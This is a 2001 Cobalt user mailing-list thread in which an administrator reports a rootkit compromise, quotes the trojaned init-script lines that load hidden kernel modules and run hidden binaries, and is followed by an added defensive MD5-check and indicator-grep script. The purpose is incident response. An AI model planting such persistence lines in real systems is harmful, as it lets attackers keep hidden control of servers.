Re: [cobalt-users] Recent Hacks (resolution in sight)
- Subject: Re: [cobalt-users] Recent Hacks (resolution in sight)
- From: John Shireley <jshirele@xxxxxxxxxxxxxxxxxxx>
- Date: Fri Feb 9 20:28:10 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Where exactly is this "unhack.pl" script located? I haven't seen it
mentioned previously, but may have missed it.
Regards,
- John
--------------------------------------------------------------
John Shireley, Operations Support Manager
CoreComm Web Hosting, formerly Voyager.net
Desk: 877.663.2748, ext. 105 Mobile: 317.710.7678
john.shireley @ voyager.net ICQ: 71529750
"Unbreakable toys are useful for breaking other toys."
On Fri, 9 Feb 2001, inc wrote:
>
> thanks to those who maintained email with me today; it's been a great help.
>
> here's my report:
>
>
> i've successfully (touch wood) used the unhack.pl script recommended by
> Steve Bassi via Mike Fritsch.
>
> after running unhack.pl, there's one file that unhack said was neither
> hacked (according to its internal MD5 checksums) nor "original" cobalt.
>
> this file, /etc/rc.d/init.d/network contains the following which i would say
> is part of the hack.
>
> /usr/bin/ssh2d -q
> if test -f "/dev/kmod"; then
> /sbin/insmod -f /usr/lib/crth.o
> /sbin/insmod -f /usr/lib/crtz.o
> fi
> if test -f /lib/security/.config/sn ; then
> cd /lib/security/.config;./lpsched
> fi
> touch /var/lock/subsys/network
> if test -f "/dev/dos"; then
> /usr/lib/lpq
> fi
> ;;
>
>
> i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
> note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
> the remaining commands there? i've disabled all these lines until i know
> what they are. my "network" script was considerably more complicated than
> the "network" script included with unhack.tar.gz
>
> i also spent the whole day studying up on cracking and studying the scripts
> and binaries that were placed on my raq.
>
> the only weird thing i could find in my logs was an ftp login from korea. i
> have not published any ftp site urls anywhere, and this is the only ftp
> login i've ever seen in the logs apart from my own, and the 127.0.0.1
> entries used by the admin. this ftp login occurred 4 hours before the
> rootkit was activated.
>
> so i would think that proftpd was exploited to gain root access.
>
> all log entries bar the ftp one above were cleaned up, but there were
> footsteps left behind in /.bash_history which reflected an rcp download from
> a us .edu site.
>
> at this point ps, su, all manner of executables are replaced to hide any
> unusual activity. flash22 suggested i try "top" -- which lo and behold
> turned up all my logins running as "/bin/xlogin" -- which appeared to be a
> copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
> have a crypted password in it. the replaced "/bin/login" was a very small
> file next to the original cobalt "/bin/login".
>
>
> i'm happy to answer any questions on this.
>
> thanks again to those who helped me climb out of the black hole!
>
>
> --
> chris paul
> fastmedia.net
>
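As an added, defender-side example (not code from this thread, and not the unhack.pl script it mentions): a small POSIX shell check that classifies a file as original, hacked or unknown by MD5 against two manifests, the three-way result the report above attributes to unhack.pl, and then scans an init script for the kinds of lines quoted from /etc/rc.d/init.d/network. The manifest format, the sample files and every hash in them are constructed here; the indicator strings are only those named in the report.

```shell
#!/bin/sh
# Added example: classify files by MD5 the way the report above says
# unhack.pl does (original / hacked / unknown), then scan an init script
# for the kinds of lines quoted from /etc/rc.d/init.d/network.
# Manifest format (hypothetical, constructed for this example):
#   <md5>  <path>      -- same layout as md5sum output.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed sample files standing in for three states of the
# network script; their hashes are computed below, nothing here is a
# real Cobalt or rootkit checksum.
printf 'original network script\n' > "$WORK/network.orig"
printf 'trojaned network script\n'  > "$WORK/network.bad"
cat > "$WORK/network.local" <<'EOF'
#!/bin/sh
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
  /sbin/insmod -f /usr/lib/crth.o
fi
touch /var/lock/subsys/network
EOF

GOOD_MANIFEST="$WORK/good.md5"   # hashes of vendor-shipped files
BAD_MANIFEST="$WORK/bad.md5"     # hashes of known-replaced files
md5sum "$WORK/network.orig" | awk '{print $1, "/etc/rc.d/init.d/network"}' > "$GOOD_MANIFEST"
md5sum "$WORK/network.bad"  | awk '{print $1, "/etc/rc.d/init.d/network"}' > "$BAD_MANIFEST"

# classify FILE -> prints "original", "hacked" or "unknown".
# "unknown" is the case the report hit: neither the vendor copy nor a
# known rootkit copy, so the file has to be read by hand.
classify() {
    sum=$(md5sum "$1" | awk '{print $1}')
    if grep -q "^$sum " "$GOOD_MANIFEST"; then echo original
    elif grep -q "^$sum " "$BAD_MANIFEST"; then echo hacked
    else echo unknown
    fi
}

# scan_init FILE -> prints numbered lines an init script has no business
# containing: module loads from /usr/lib, an unexpected daemon, commands
# run from a hidden directory, and the device-file flags used as switches.
scan_init() {
    grep -nE 'insmod|ssh2d|/lib/security/\.config|/dev/kmod|/dev/dos' "$1" || true
}

classify "$WORK/network.local"   # unknown
scan_init "$WORK/network.local"
```

The "unknown" verdict is the important one: a checksum tool can only clear files it has a baseline for, so anything it cannot match still has to be read line by line, as the report did.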